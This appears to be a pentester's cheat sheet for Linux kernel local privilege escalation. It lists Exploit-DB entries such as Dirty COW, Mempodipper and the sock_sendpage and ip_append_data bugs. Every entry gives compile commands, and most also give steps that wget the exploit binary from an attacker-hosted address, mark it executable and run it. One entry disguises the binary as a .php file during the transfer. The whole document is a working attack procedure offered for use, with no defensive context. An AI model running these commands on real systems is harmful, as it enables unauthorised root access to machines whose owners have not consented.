**Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)**

If the target machine has a 32-bit architecture, we cross-compile the exploit on our own machine.

```bash
$ gcc -m32 -Wl,--hash-style=both -o 9542 9542.c
$ wget http://192.168.1.1/9542 && chmod +x 9542 && ./9542
```

**Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation**

If this doesn't work, we should change the module. List of modules (comment 24): https://bugzilla.redhat.com/show_bug.cgi?id=516949#c24

Line 349: `if ((out_fd = socket({MODULENAME}, SOCK_DGRAM, 0)) == -1)`

```bash
gcc -m32 -Wl,--hash-style=both 9545.c -o 9545
wget http://192.168.1.1/9545 && chmod +x 9545 && ./9545
```

linux-sendpage.c (same as 9545):

```
 * Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
 * are vulnerable.
 * For i386 and ppc, compile with the following command:
 * gcc -Wall -o linux-sendpage linux-sendpage.c
 *
 * And for x86_64 and ppc64:
 * gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
```

**Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)**

`exploits/linux/local/35161.c`

```bash
mkdir /tmp/poc
cd /tmp/poc
wget http://192.168.1.1/35161.c
gcc 35161.c -o poc
./poc
```

**Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation**

```bash
cp /usr/share/exploitdb/exploits/linux/local/44298.c .
gcc 44298.c -o exploit.php
wget http://192.168.1.1:8080/exploit.php
mv exploit.php exploit
chmod +x exploit
./exploit
```

**Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation**

```bash
$ gcc cve-2017-16995.c -o cve-2017-16995
$ ./cve-2017-16995
```

**Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)**

```bash
$ gcc -pthread dirty.c -o dirty -lcrypt
$ ./dirty
```